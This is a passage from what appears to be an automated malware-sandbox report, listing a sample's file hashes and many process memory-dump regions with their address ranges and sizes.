                                                                                                                                            86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea

                                                                                                                                            SHA256

                                                                                                                                            b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3

                                                                                                                                            SHA512

                                                                                                                                            5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df

                                                                                                                                          • memory/360-240-0x0000000005A90000-0x0000000005A91000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/360-201-0x0000000000920000-0x0000000000921000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/360-122-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/360-195-0x0000000077020000-0x00000000771AE000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.6MB

                                                                                                                                          • memory/364-147-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/364-170-0x0000000000910000-0x0000000000911000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/364-213-0x0000000005190000-0x0000000005206000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            472KB

                                                                                                                                          • memory/664-184-0x0000000005870000-0x0000000005871000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/664-159-0x0000000000B00000-0x0000000000B01000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/664-219-0x0000000005260000-0x0000000005866000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            6.0MB

                                                                                                                                          • memory/664-197-0x0000000005370000-0x0000000005371000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/664-194-0x0000000005310000-0x0000000005311000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/664-220-0x00000000053B0000-0x00000000053B1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/664-250-0x0000000005620000-0x0000000005621000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/664-119-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/796-114-0x0000000003980000-0x0000000003ABF000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.2MB

                                                                                                                                          • memory/800-357-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/1360-172-0x0000000000ED0000-0x0000000000ED1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/1360-155-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/1360-208-0x0000000001420000-0x000000000143C000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            112KB

                                                                                                                                          • memory/1360-229-0x0000000001410000-0x0000000001412000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/1556-202-0x00000000053C0000-0x00000000053C1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/1556-237-0x0000000005A50000-0x0000000005A51000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/1556-153-0x0000000000BC0000-0x0000000000BC1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/1556-209-0x00000000053C0000-0x0000000005436000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            472KB

                                                                                                                                          • memory/1556-182-0x0000000005440000-0x0000000005441000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/1556-135-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/1660-131-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/1660-258-0x0000000005B40000-0x0000000005B41000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/1660-235-0x0000000000C90000-0x0000000000C91000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/1660-301-0x0000000077020000-0x00000000771AE000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.6MB

                                                                                                                                          • memory/1688-225-0x0000000005480000-0x0000000005A86000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            6.0MB

                                                                                                                                          • memory/1688-169-0x0000000000CF0000-0x0000000000CF1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/1688-145-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/2088-142-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/2088-371-0x0000000002CD0000-0x0000000002D7E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            696KB

                                                                                                                                          • memory/2088-389-0x0000000004F73000-0x0000000004F74000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2088-383-0x0000000004F70000-0x0000000004F71000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2088-387-0x0000000004F72000-0x0000000004F73000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2088-382-0x0000000000400000-0x0000000002CD0000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            40.8MB

                                                                                                                                          • memory/2088-395-0x0000000004F74000-0x0000000004F76000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/2116-391-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/2276-180-0x0000000077020000-0x00000000771AE000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.6MB

                                                                                                                                          • memory/2276-116-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/2276-206-0x0000000000320000-0x0000000000321000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2276-244-0x0000000005650000-0x0000000005651000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2288-218-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2288-187-0x0000000000540000-0x0000000000541000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2288-150-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/2308-336-0x0000000005390000-0x0000000005391000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/2308-115-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/2308-326-0x0000000077020000-0x00000000771AE000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.6MB

                                                                                                                                          • memory/2496-435-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/2868-327-0x0000000000400000-0x00000000027DB000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            35.9MB

                                                                                                                                          • memory/2868-323-0x0000000004870000-0x0000000005196000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            9.1MB

                                                                                                                                          • memory/2868-140-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3024-318-0x00000000007B0000-0x00000000007C6000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            88KB

                                                                                                                                          • memory/3424-406-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3476-120-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3488-385-0x000000001B020000-0x000000001B022000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            8KB

                                                                                                                                          • memory/3488-354-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3872-121-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3908-423-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3908-128-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3964-437-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            80KB

                                                                                                                                          • memory/3964-424-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3968-130-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3968-246-0x00000000023B0000-0x00000000024FA000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            1.3MB

                                                                                                                                          • memory/3968-264-0x0000000000400000-0x00000000023B0000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            31.7MB

                                                                                                                                          • memory/4016-439-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4020-419-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4100-410-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4100-422-0x0000000004CA0000-0x0000000004CA1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4104-585-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4108-171-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            80KB

                                                                                                                                          • memory/4108-163-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4144-166-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4144-369-0x00000000049B0000-0x0000000004A4D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            628KB

                                                                                                                                          • memory/4144-380-0x0000000000400000-0x0000000002D0E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            41.1MB

                                                                                                                                          • memory/4208-188-0x0000000000950000-0x00000000009FE000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            696KB

                                                                                                                                          • memory/4208-190-0x0000000000950000-0x00000000009FE000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            696KB

                                                                                                                                          • memory/4208-173-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4268-299-0x00000000024A0000-0x00000000024D0000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            192KB

                                                                                                                                          • memory/4268-317-0x0000000000400000-0x00000000023BB000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            31.7MB

                                                                                                                                          • memory/4268-183-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4336-252-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-254-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-217-0x0000000003950000-0x000000000398C000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            240KB

                                                                                                                                          • memory/4336-236-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-234-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-232-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-245-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-247-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-288-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-191-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4336-221-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-249-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-256-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-257-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-260-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-268-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-275-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-279-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-222-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-297-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4336-282-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4356-427-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4356-338-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4368-402-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4484-440-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4616-411-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4668-315-0x0000000005650000-0x0000000005B4E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            5.0MB

                                                                                                                                          • memory/4668-289-0x0000000005730000-0x0000000005731000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4668-262-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            120KB

                                                                                                                                          • memory/4668-265-0x000000000041905A-mapping.dmp
                                                                                                                                          • memory/4676-263-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            120KB

                                                                                                                                          • memory/4676-312-0x0000000005200000-0x0000000005806000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            6.0MB

                                                                                                                                          • memory/4676-266-0x0000000000418E52-mapping.dmp
                                                                                                                                          • memory/4696-442-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            80KB

                                                                                                                                          • memory/4696-432-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4816-429-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4816-446-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            80KB

                                                                                                                                          • memory/4832-305-0x0000000000418F7A-mapping.dmp
                                                                                                                                          • memory/4832-322-0x00000000051C0000-0x00000000057C6000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            6.0MB

                                                                                                                                          • memory/4924-330-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4948-277-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4984-280-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4984-294-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            12KB

                                                                                                                                          • memory/5036-366-0x0000022638280000-0x00000226382EF000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            444KB

                                                                                                                                          • memory/5036-367-0x00000226382F0000-0x00000226383BF000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            828KB

                                                                                                                                          • memory/5036-286-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5128-584-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5148-443-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5168-444-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5168-460-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            436KB

                                                                                                                                          • memory/5196-447-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5200-615-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5224-449-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5256-450-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5300-454-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5372-458-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5428-461-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5496-464-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5504-586-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5580-472-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5632-582-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5720-540-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5768-591-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5780-485-0x00007FF6C4C54060-mapping.dmp
                                                                                                                                          • memory/5984-583-0x0000000000000000-mapping.dmp